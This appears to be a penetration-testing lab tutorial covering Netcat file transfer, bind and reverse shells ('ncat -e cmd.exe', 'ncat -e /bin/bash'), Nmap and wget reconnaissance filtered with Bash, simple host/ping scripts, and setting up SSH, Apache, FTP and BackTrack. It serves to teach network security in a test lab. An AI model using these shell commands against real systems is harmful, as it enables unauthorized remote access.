Netcat and Bind Shells

Netcat and Bind Shells Overview

Netcat is a network tool that reads from and writes to TCP and UDP ports. It can act as either a server or a client, so it can stand in for a web server, a mail server, a chat server, or almost any other kind of server. It can also transfer files or serve any process, even a command shell.

“It is all things, to all people, for all reasons” – Steve Butler.

For this lab exercise install both Netcat and Nmap on two separate computers. Use a Linux computer (CentOS, Mint, Ubuntu, etc.) and a computer running Windows 7, Windows 8.1, Windows 10, etc.

  1. In Linux, install Nmap and Netcat (nmap installs both programs):
     In CentOS:
     yum install nmap
     In Mint or Ubuntu:
     sudo apt-get install nmap
  2. In Windows, download the Netcat/Ncat program (ncat.exe) and copy it to your C:\Windows\ folder (http://nmap.org/dist/ncat-portable-5.59BETA1.zip). You may need to whitelist it if you are running an antivirus program.
  3. In Windows, download and install Nmap from http://nmap.org/download.html. Use the latest release self-installer: nmap-7.01-setup.exe

Netcat was created in 1996 and is to this day still considered a great network debugging and testing tool. In 2005 the makers of Nmap created an updated version of Netcat called Ncat that offers additional features like SSL support. Ncat is installed with Nmap for Windows. You can download an updated version of Ncat for Windows at this website: http://nmap.org/ncat/. Scroll to the bottom and look for the Windows binary.

sbd is a Netcat clone that offers encryption and runs on Windows or Linux. You can find it and many other netcat related tools here: http://packetstormsecurity.org/UNIX/netcat/

A good overview about Netcat: http://en.wikipedia.org/wiki/Netcat

 

Exercise 1 – Setup a Netcat connection between two hosts (send text)

  1. Connect to your Windows client (or any network host) and run Netcat.
  2. Copy ncat.exe into your C:\Windows\ directory so that it is available on your command PATH.
  3. Open a command prompt. The following command sets Netcat to listen verbosely on port 4444:
     ncat -lvp 4444
  4. Check with Netstat. You should see that Netcat is listening on TCP port 4444:
     netstat -an | FIND "4444"
  5. Go to your Linux client, open a terminal with root access, and connect with Netcat on port 4444. If you are using Mint or Ubuntu, put sudo before ncat:
     ncat <ip address you are connecting to> 4444
  6. You should eventually see an open connection; try typing "hello" back and forth between the clients.

Exercise 2 – Transfer files using Netcat (pipe to a file)

  1. In Linux use your favorite text editor and type a sentence of text. Save the file as fileshare.txt
  2. In your Windows client type this into the command prompt:
    ncat -lvp 2233 > fileshare.txt
  3. From a Linux terminal type in the following commands (start with sudo if using Mint or Ubuntu):
    ncat <the IP address> 2233 < fileshare.txt
  4. Check your Windows client to see if you received the file.
  5. How would you make the listener (the server) send the file instead of receiving it?

Exercise 3 – Bind a command prompt to a port creating a Bind Shell (the server listens with a shell attached)

  1. In your Windows client open a command prompt. The following sets cmd.exe to execute on port 7777 when a connection is established:
    ncat -lvp 7777 -e cmd.exe
  2. In your Linux client open a terminal window and connect with Netcat on port 7777 (start with sudo if using Mint or Ubuntu):
    ncat <the ip address to connect to> 7777
  3. If you are successful you will eventually see a Windows command shell in your Linux terminal. You bound a shell (cmd.exe) to a port and served it.

Exercise 4 – Create a reverse Bind Shell (the client sends the shell)

  1. In your Windows client open a command prompt. This sets Netcat to listen on port 7777 (the server):
     ncat -lvp 7777
  2. In the Linux client terminal the following command connects to the listening Netcat server on the Windows client on port 7777 and hands it a bash shell (start with sudo if using Mint or Ubuntu):
     ncat -nv <the ip address> 7777 -e /bin/bash
  3. If you are successful you will receive a shell on the Windows client in which you can type bash commands. Try running an ls command. You will not see a # prompt.


Exercise 5 – World’s simplest web server (pipe an HTML file to a port)

  1. Create or download a simple webpage, save it to the current directory, and then run this command in a terminal (start with sudo if using Mint or Ubuntu):
     cat index.html | ncat -vl 80
  2. Now, on another computer on your network, connect to that IP address and view the webpage.
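Piping the bare file into Ncat works with some clients, but the response carries no HTTP status line or headers, and a browser may reject it as malformed. The following is an added example, not from the original lab, that wraps a file in a minimal HTTP/1.0 response and hands it to Ncat's --sh-exec option; the page contents, the WORK directory and the helper names (http_response, status_line, content_length, body, serve) are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not part of the original lab. "cat index.html | ncat -vl 80"
# pushes the raw file with no status line or headers, which modern browsers
# may reject. This wraps a file in a minimal valid HTTP/1.0 response; Ncat's
# --sh-exec option then runs the wrapper once per client. The page is constructed.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
printf '<html><body><h1>hello</h1></body></html>\n' > "$WORK/index.html"

# Status line, headers, blank line, then the body. CRLF line endings and a
# Content-Length header are what the client expects; Connection: close tells
# it not to wait for more.
http_response() {  # $1 = file to serve
    len=$(wc -c < "$1" | tr -d ' ')
    printf 'HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nContent-Length: %s\r\nConnection: close\r\n\r\n' "$len"
    cat "$1"
}

# Helpers to inspect what a client would receive.
status_line()    { http_response "$1" | head -n 1 | tr -d '\r'; }
content_length() { http_response "$1" | grep -i '^Content-Length:' | tr -d '\r' | cut -d " " -f 2; }
body()           { http_response "$1" | tail -c "$(wc -c < "$1" | tr -d ' ')"; }

# Serve it for real (not run here): -k keeps listening after each client and
# --sh-exec runs the command through /bin/sh with the socket as stdin/stdout.
# Port 80 needs root; 8080 does not.
serve() {  # $1 = file, $2 = port
    ncat -l -k "$2" --sh-exec "printf 'HTTP/1.0 200 OK\r\nContent-Type: text/html\r\nConnection: close\r\n\r\n'; cat '$1'"
}

http_response "$WORK/index.html"
```

Run with a port above 1024 as an unprivileged user (serve "$WORK/index.html" 8080), then fetch it from the other machine; the status line is the part the plain cat-to-ncat version never sends.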

Video Tutorial

In these video tutorials, I execute the lab using BackTrack Linux.

Bash Line Commands & Shell Scripting

Overview

It is useful to be able to use Bash shell commands to gather information about a test target and to filter that information down to the useful data. For example, you could use wget to download the contents of a web page and then sort through and filter the results for links, domains, subdomains, and IP addresses that can be tested later for vulnerable open services.

#wget "http://www.some-website.com"

You can also use Bash shell commands to filter and sort through any kind of text output. In the example below I run an Nmap scan of a LAN and then filter and sort through the results.

Exercise 1 – Scan a network for IP addresses and open ports. Sort and filter your data with Bash line commands.

Try running these steps, which contain useful commands:

  1. Work in a test network environment, or one that you have permission to scan with Nmap, and try the following commands in a root terminal.
  2. Run an Nmap scan on an entire network looking for responding hosts and open ports:
     #nmap 192.168.1.1-254  (substitute your network's address scheme)
  3. Output/save the results to a text file:
     #nmap 192.168.1.1-254 > scan.txt
  4. Cat the results to your terminal:
     #cat scan.txt
  5. If there are active responding computers in the network you may see a line such as "Nmap scan report for 192.168.1.100". Now you can use Bash to filter the results by piping them to a grep command:
     #cat scan.txt | grep "report"
  6. Using the cut command and specifying a delimiter of a space (-d " "), you can split the text string into separate pieces at the spaces between the words and then grab the field you need (-f 5):
     #cat scan.txt | grep "report" | cut -d " " -f 5
     This way the result is just the responding IP addresses from the Nmap scan. Example:
     Nmap scan report for 192.168.1.100
     Nmap scan report for 192.168.1.101
     Nmap scan report for 192.168.1.102
     becomes just:
     192.168.1.100
     192.168.1.101
     192.168.1.102
  7. If you needed to sort the data because of redundant addresses, you could add the sort command (-u) to alphabetize it and remove duplicates:
     #cat scan.txt | grep "report" | cut -d " " -f 5 | sort -u
  8. The initial Nmap command would also have shown any open ports and services that could be contacted. If we want to filter the results to show the IP addresses followed by the open port numbers, we can make grep match any line containing the string "report" or any line containing the string "open", using an escaped pipe (\|) as a logical OR, like this:
     #cat scan.txt | grep "report\|open"
  9. Now you need to pipe to the cut command to clean the results. What would your final command look like so that your output is clean? Hint: add more pipes and more cuts to the command to strip away the unnecessary words.
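As an added example (not part of the original lab), here are the grep/cut/sort steps run against a constructed Nmap output listing, so it works offline. It goes a little beyond the steps above: it pulls the address out with a regex so that report lines carrying a reverse-DNS name still work, and it keeps each open port paired with the host it belongs to. The scan text, the addresses and the function names (report_ips, open_ports) are made up for this example.

```shell
#!/bin/sh
# Added example (not part of the original lab): the grep/cut/sort steps above,
# run over a constructed Nmap normal-output listing so it works offline.
# Every address and hostname below is made up.
SCAN='Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-01 12:00 UTC
Nmap scan report for router.lan (192.168.1.1)
Host is up (0.0010s latency).
PORT   STATE SERVICE
53/tcp open  domain
Nmap scan report for 192.168.1.100
Host is up (0.0012s latency).
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http
443/tcp closed https
Nmap scan report for 192.168.1.101
Host is up (0.0034s latency).
All 1000 scanned ports on 192.168.1.101 are closed
Nmap scan report for 192.168.1.100
Host is up (0.0010s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 254 IP addresses (3 hosts up) scanned in 10.00 seconds'

# Responding hosts. "cut -d ' ' -f 5" breaks when reverse DNS turns the line
# into "report for router.lan (192.168.1.1)", so pull the dotted quad out of
# the report line with a regex instead; sort -u drops the host scanned twice.
report_ips() {
    printf '%s\n' "$SCAN" | grep "report" | grep -oE '[0-9]+(\.[0-9]+){3}' | sort -u
}

# "ip port/proto service" for every open port. A plain grep "report\|open"
# loses which host a port belongs to, so walk the lines and remember the
# current host; tr -s collapses the column padding so the cut fields line up.
open_ports() {
    printf '%s\n' "$SCAN" | while read -r line; do
        case "$line" in
            "Nmap scan report for"*)
                ip=$(printf '%s\n' "$line" | grep -oE '[0-9]+(\.[0-9]+){3}') ;;
            *" open "*)
                printf '%s %s\n' "$ip" "$(printf '%s\n' "$line" | tr -s ' ' | cut -d " " -f 1,3)" ;;
        esac
    done | sort -u
}

report_ips
open_ports
```

Against a real scan, replace the SCAN variable with `cat scan.txt`; the rest of each pipeline is unchanged. Nmap's -oG (grepable) output format is the better input for scripts, but the point here is what the plain-text steps above can and cannot recover.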

 

Exercise 2 – Download a webpage, sort and filter the results for subdomains and servers 

Try running these steps which have useful commands:

  1. Download the Yahoo homepage using wget:
     #wget "http://yahoo.com"
  2. Examine the results using cat:
     #cat index.html
  3. Now we need to filter our results down to subdomains of yahoo.com. To do this we can search for the lines containing the text yahoo.com:
     #cat index.html | grep "yahoo.com"
  4. Your result will still be too large to be of use. To continue filtering, we can assume that most of the domains have "http://" in front of them, and cut the lines on a delimiter of a colon, taking the second field:
     #cat index.html | grep "yahoo.com" | cut -d ":" -f 2
  5. Now most of the lines will start with //, so we can cut on "/" and grab the 3rd field:
     #cat index.html | grep "yahoo.com" | cut -d ":" -f 2 | cut -d "/" -f 3
  6. Remove duplicate lines with sort:
     #cat index.html | grep "yahoo.com" | cut -d ":" -f 2 | cut -d "/" -f 3 | sort -u
  7. You may need to remove trailing characters from a line with a domain name, as in this example:
     info.yahoo.com" this is a sample of training text
     The trailing text starts with a quotation mark, which the shell would treat as the start of a string. Escape the quotation mark with a backslash so that it is passed to cut as a literal character rather than acting as a demarcation point. See below:
     #cat index.html | grep "yahoo.com" | cut -d ":" -f 2 | cut -d "/" -f 3 | sort -u | cut -d "\"" -f 1
  8. Save your results to a text file:
     #cat index.html | grep "yahoo.com" | cut -d ":" -f 2 | cut -d "/" -f 3 | sort -u | cut -d "\"" -f 1 > domains.txt
  9. Output your text file to the screen and continue to sort, cut and grep until you have only unique subdomains:
     #cat domains.txt | sort -u | grep "yahoo.com"
  10. Write the results back into the text file. Redirecting straight to domains.txt truncates the file before cat can read it, so write to a new file and then rename it over the original:
     #cat domains.txt | sort -u | grep "yahoo.com" > domains-clean.txt
     #mv domains-clean.txt domains.txt

You can see from the list above that there are actually many different subdomains, services and servers.
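An added example (not from the original lab) that covers two points from the steps above: extracting the subdomains with grep -o, which returns only the matched URL so the quote-escaping cut is not needed and scheme-relative "//host" links are caught too, and rewriting the results file safely, because redirecting a pipeline's output to the same file it reads truncates it. The HTML, the yahoo.com hostnames in it, the WORK directory and the function names (extract_hosts, rewrite_in_place, demo_unsafe, demo_safe) are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of the original lab. Two points from the exercise
# above: pulling subdomains out of a saved page, and rewriting a file with a
# pipeline that also reads it. The HTML is constructed, not real Yahoo markup.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
cat > "$WORK/index.html" <<'EOF'
<html><head><link rel="stylesheet" href="https://s.yimg.com/css/main.css"></head>
<body><a href="http://mail.yahoo.com/">Mail</a> <a href="https://news.yahoo.com/world">News</a>
<a href="http://mail.yahoo.com/login">Login</a><img src="//images.yahoo.com/logo.png">
<a href="http://notyahoo.com/">other</a><script src="https://finance.yahoo.com:443/q.js"></script>
</body></html>
EOF

# Hosts under a parent domain. grep -o prints only the matched URL prefix, so
# the surrounding quotes never reach cut (no cut -d "\"" step needed) and
# "//host" links are matched as well as http:// and https:// ones. Field 3
# after "/" is the host, a trailing :port is dropped, and sort -u removes repeats.
# The pattern has no trailing boundary check, so "x.yahoo.com.other.net" would
# still yield x.yahoo.com; tighten it before trusting it on hostile pages.
extract_hosts() {  # $1 = saved page, $2 = parent domain such as yahoo.com
    parent=$(printf '%s' "$2" | sed 's/\./\\./g')   # escape the dots for the regex
    grep -oE "(https?:)?//[A-Za-z0-9.-]+\.$parent(:[0-9]+)?" "$1" \
        | cut -d "/" -f 3 | cut -d ":" -f 1 | sort -u
}

# "sort -u < f > f" (or "cat f | sort -u > f") is a data-loss bug: the shell
# truncates f for the output redirection before sort reads it, so f ends up
# empty. Write to a temporary file and rename it over the original instead.
rewrite_in_place() {  # $1 = file; the filter is the exercise's sort -u
    sort -u "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Line counts left behind by the unsafe form (0) and the safe form (2).
demo_unsafe() {
    printf 'b\na\nb\n' > "$WORK/unsafe.txt"
    sort -u < "$WORK/unsafe.txt" > "$WORK/unsafe.txt"
    wc -l < "$WORK/unsafe.txt" | tr -d ' '
}
demo_safe() {
    printf 'b\na\nb\n' > "$WORK/safe.txt"
    rewrite_in_place "$WORK/safe.txt"
    wc -l < "$WORK/safe.txt" | tr -d ' '
}

extract_hosts "$WORK/index.html" yahoo.com
```

On a real download, call extract_hosts index.html yahoo.com; the bare parent domain itself (yahoo.com with no subdomain label) is deliberately not matched, since the exercise is after subdomains.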

Exercise 3 – Write a Bash shell script to automate host and ping commands 

Write a shell script which will loop through a list of domain names, issuing a host command on each name, in order to return the IP address that maps to each name.

  1. Using a text editor like nano, gedit or vim, open a new text file and name it ips.sh
  2. You will write a shell script that loops through the list of subdomains you created above and saved as domains.txt. Type the following lines into your ips.sh file:
     #!/bin/bash
     for name in $(cat domains.txt); do
         host "$name"
     done
     Save the file and exit. This script loops through the domains and issues a host command on each domain name.
  3. Give the script file executable permissions:
     #chmod 755 ips.sh
  4. Run the script:
     #./ips.sh
  5. Output the results to a text file:
     #./ips.sh > server-ips.txt
  6. Clean up the results. Rewrite the shell script, adding pipes, grep, cut and sort commands so that it produces only IP addresses.
  7. You should now have a file with only the IP addresses that each subdomain resolves to.

Write a shell script which will loop through a list or sequence of IP addresses, issuing a single ping command on each IP address, in order to determine which IPs will respond.

  1. Using a text editor like nano, gedit or vim, open a new text file and name it ping.sh
  2. You will write a shell script that loops through a sequence or list of IP addresses like the one you just created. Type the following lines into your ping.sh file:
     #!/bin/bash
     for ip in $(seq 150 250); do
         ping -c 1 192.168.1.$ip
     done

     The $(seq 150 250) command produces every number from 150 to 250, so the loop covers 192.168.1.150 through 192.168.1.250. Alternatively, you could use the list of IPs in the text file you created earlier:
     #!/bin/bash
     for ip in $(cat server-ips.txt); do
         ping -c 1 "$ip"
     done
  3. Save the file, give it executable permissions, and run it:
     #chmod 755 ping.sh
     #./ping.sh
  4. Edit your script file by adding grep, cut, and sort commands to clean up the results so that only replying IP addresses are listed.
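As an added example (not part of the original lab), the two scripts above with their output cleaned up: a_records keeps only the "has address" lines that host prints, resolve_list reads the name file line by line instead of word-splitting $(cat ...), and live_hosts uses ping's exit status rather than grepping its text. The sample host output is constructed (documentation addresses and made-up names), and the function names are assumptions for this example; resolve_list and live_hosts need DNS and network access, so only the parsing is exercised offline.

```shell
#!/bin/sh
# Added example, not part of the original lab. Cleans up the host(1) output
# the ips.sh loop produces and lists only the addresses that answer ping.sh's
# single ping. HOST_OUT is a constructed sample of what host prints
# (documentation addresses, made-up names).
HOST_OUT='www.yahoo.com is an alias for edge.example-cdn.net.
edge.example-cdn.net has address 203.0.113.10
edge.example-cdn.net has address 203.0.113.11
edge.example-cdn.net has IPv6 address 2001:db8::10
news.yahoo.com has address 203.0.113.20
Host bogus.yahoo.com not found: 3(NXDOMAIN)'

# Keep the "NAME has address A.B.C.D" lines (this drops the alias, IPv6 and
# NXDOMAIN lines) and take the address in field 4.
a_records() {  # host output on stdin
    grep " has address " | cut -d " " -f 4 | sort -u
}

# Same loop as ips.sh, but reading the file line by line: $(cat domains.txt)
# word-splits on any whitespace, and a file saved on Windows leaves a \r on
# every name, which makes host look up "name\r" and fail.
resolve_list() {  # $1 = file of names; prints "name address" per A record
    tr -d '\r' < "$1" | while read -r name; do
        [ -n "$name" ] || continue
        host "$name" 2>/dev/null | a_records | sed "s/^/$name /"
    done
}

# Instead of grepping ping's text, use its exit status: iputils ping returns
# 0 only when a reply arrived (-W 1 caps the wait at one second on Linux;
# other ping implementations spell the timeout option differently).
live_hosts() {  # $1 = file of addresses; prints the ones that replied
    tr -d '\r' < "$1" | while read -r ip; do
        [ -n "$ip" ] || continue
        if ping -c 1 -W 1 "$ip" >/dev/null 2>&1; then printf '%s\n' "$ip"; fi
    done
}

printf '%s\n' "$HOST_OUT" | a_records
```

In the lab, `resolve_list domains.txt | cut -d " " -f 2 | sort -u > server-ips.txt` followed by `live_hosts server-ips.txt` replaces the grep/cut/sort rewrite that steps 6 and 4 ask for.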

Additional Study

There are more powerful tools for filtering and replacing text, like awk and sed, and higher-level scripting languages like Perl, Python, Ruby and PHP, as well as regular expressions. It is worth your while to learn how to use them.

Run Services (SSH, FTPD, HTTPD)

Introduction

If we are going to penetrate victim computers (in the test lab) and establish communication to and from those clients so that we may execute commands and transfer files, we will need some network services, like SSH and FTP.

SSH 

SSH, or secure shell, allows you to open a secure terminal connection to a remote host, or simply to log in to a remote computer in order to execute commands. This is done through a client-server model in which an SSH client connects to an SSH server. This type of connection is typically used to securely exchange encrypted data with a remote host; the data is usually commands, but it can also be files, using SFTP and SCP, which run over the SSH protocol. SSH was developed to replace insecure remote connection protocols like rlogin, telnet and rsh. SSH typically runs on port 22. SSH should be installed by default in BackTrack.

Manual pages on SSH and the SSH daemon
#man ssh
#man sshd

Generate the secure keys for the host service
#sshd-generate
or
#ssh-keygen

Start the SSH server using the scripts in the init.d directory
#/etc/init.d/ssh start

Check to see if SSH is listening on Port 22
#netstat -antp

Since you are now running an SSH server, you could download PuTTY to your Windows client and SSH into your BackTrack machine. Try this, was it successful? If not, where might the block be? Are you VPN’d? Are there any firewalls on the client or on an intermediary network device?

Stop the SSH server using the scripts in the init.d directory
#/etc/init.d/ssh stop

If you want instructions on how to install SSHD in Ubuntu go here.

HTTPD (Apache)

The Apache webserver is the most widely used webserver on the internet. From a network penetration perspective, a webserver could be used as an exploitation tool, serving up malicious files and scripts that execute against a victim's browser and computer. It could also be used as a way of transferring files to a victim machine once access has already been gained. Webservers, by their very public nature, are a great way for a hacker to gather information or reconnaissance about a company or target. The Apache webserver usually runs on port 80.

Start the Apache2 server using the scripts in the init.d directory
#/etc/init.d/apache2 start

Verify if Apache is listening on Port 80
#netstat -antp

Your server’s accessible web directory is located in /var/www/ and is where you would put your webpages.

If you want instructions on how to install HTTPD Apache in Ubuntu go here.

FTPD

FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21 and transfers files on port 20.

The steps to setting up pure-FTPd:

Installation (pure-ftpd is installed by default in BackTrack, but in case you are using another Linux distribution):
#apt-get install pure-ftpd
#yum install pure-ftpd

Configuration to add an FTP user and set up an FTP directory
#groupadd ftpgroup
#useradd -g ftpgroup -d /dev/null -s /etc ftpuser
#pure-pw useradd <your ftp username> -u ftpuser -d /home/ftp/pub/<your ftp username>
You will be prompted to input a password twice
#pure-pw mkdb
#cd /etc/pure-ftpd/auth
#ln -s ../conf/PureDB 60pdb
#mkdir /home/ftp
#mkdir /home/ftp/pub
#mkdir /home/ftp/pub/<your ftp username>
#chown -R ftpuser:ftpgroup /home/ftp/pub/<your ftp username>
#/etc/init.d/pure-ftpd restart

Test your install of Pure-FTPd by FTPing to your loopback IP address
#ftp 127.0.0.1
key in your <ftp username>
key in your <ftp password>

Install & Configure BackTrack

Overview

You will need to download the BackTrack 4 or 5 operating system, which you can find at: http://www.backtrack-linux.org/downloads/ . You can download either an .iso file, which you will need to burn as a disc image, or a VMware image of the operating system, which you can open as a virtual machine through VMware Player in Windows. If you decide to use the VMware image you will need to download the free version of VMware Player as well. You can find it here: http://downloads.vmware.com/d/info/desktop_downloads/vmware_player/3_0

Once you have BackTrack installed and running you will want to know how to do the following things:

Login, the default is:
login: root
password: toor

Change the root password:
#passwd
<enter your new password twice>

Launch the Xwindows graphical user interface:
#startx

To bring up your network interfaces and be able to get online:
Check what interfaces you have (eth0, eth1, wlan0, etc.)
#ifconfig

For a wireless network card running DHCP
#iwconfig wlan0 mode managed key <your wep key>
#iwconfig wlan0 essid <your ssid>
#ifconfig wlan0 up
#dhclient wlan0

For a wired network card running DHCP
#ifconfig eth0 up
#dhclient eth0

For a manual configuration instead of running the DHCP client
#ifconfig eth0 <your desired ip address and /subnet mask -e.g. 192.168.1.100/24>
#route add default gw 192.168.1.1
#echo nameserver 192.168.1.1 > /etc/resolv.conf

Now test your connection by running a ping command or opening a website in your browser

Video Tutorial